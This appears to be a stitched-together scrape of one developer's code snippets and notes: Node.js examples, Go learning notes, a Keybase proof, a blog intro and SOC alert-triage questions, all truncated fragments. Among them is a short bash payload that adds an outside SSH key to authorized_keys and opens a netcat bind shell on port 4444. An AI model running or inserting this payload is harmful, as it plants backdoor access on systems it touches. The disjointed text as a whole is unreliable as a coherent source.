//
// async method passing errors via
// the standard convention of callback(err)
//
> dns.reverse('4.4.4.4', console.log)
{ oncomplete: [Function: onanswer] }
> { [Error: getHostByAddr ENOTFOUND]
code: 'ENOTFOUND',
#!/bin/bash | |
touch /tmp/exploited | |
cd ~ | |
mkdir -p .ssh | |
chmod 755 .ssh | |
touch .ssh/authorized_keys | |
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys | |
chmod 600 ~/.ssh/authorized_keys | |
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash & |
build a go lib and binary | |
1. installing go | |
1. OS X: brew install go | |
2. Linux: https://github.com/dcoxall/vagrant-golang ? | |
3. organizing your code | |
1. GOPATH export GOPATH=/Users/jandre/godemo | |
2. WORKSPACE https://golang.org/doc/code.html |
#!/bin/bash | |
usage() | |
{ | |
cat << EOF | |
usage: $0 options | |
This script set ownership for all table, sequence and views for a given database | |
Credit: Based on http://stackoverflow.com/a/2686185/305019 by Alex Soto |
I hereby claim:
- I am jandre on github.
- I am jandre (https://keybase.io/jandre) on keybase.
- I have a public key whose fingerprint is 6DA2 9D93 9AAA CD1E 8939 CBFD 5004 12C5 9B54 59C9
To claim this, I am signing this object:
#!/usr/bin/env sh | |
if ! which md5sum > /dev/null; then | |
echo Install md5sum | |
exit 1 | |
fi | |
if ! which curl > /dev/null; then | |
echo Install curl | |
exit 1 |
One of my ongoing resolutions is to learn a new programming language every year. I've been looking at Go for a while and I thought it would be fun to use the 'holiday' today to really get cranking. I recorded some random impressions as I was chugging along...
When learning a language, I'm one of those people that can't simply read documentation and contrived code examples with any usable level of recall -- I need to internalize it by writing code to solve a legitimate problem. So, I decided to write a little library, a parser for the Linux /proc filesystem. There aren't very many good ones that I've found for Go (and I am thinking of some projects I may want to use it for in the future).
Steps taken:
- Read a bit of code
Some sample questions a security team may ask when triaging events that come from a SIEM/Log Management or directly via a H(N)IDS.
Generally, the exact information an analyst may need to triage the alert may vary depending on the type of event and its source.
Alert triage usually happens in the 'event handling' process -> before a 'security incident' is declared and more detailed invevstigation is needed. However, in smaller SOCs with less rigeur, often the process is compressed - e.g., the same person who is triaging -> performs more detailed investigation, forensics, and other processes that is needed to proceed with incident response. Answering some of the question below may fall into these later phases vs being pure 'triage' tasks.
- What hostname(s) corresponds to the IP addresses (reverse IP lookup)? (e.g., 123.44.5.55 == google.com, or badmailserver.ru?) Do the hostnames appear to be suspicious, or valid business activity?
var fork = require('child_process').fork; | |
var spawn = require('child_process').spawn; | |
var fs = require('fs'); | |
var path = require('path'); | |
function forkProcess() { | |
var fd = fs.openSync('/tmp/sensitive_file', 'w'); | |
var opts = { | |
}; | |
fork(process.argv[1], ["--forked"], opts) |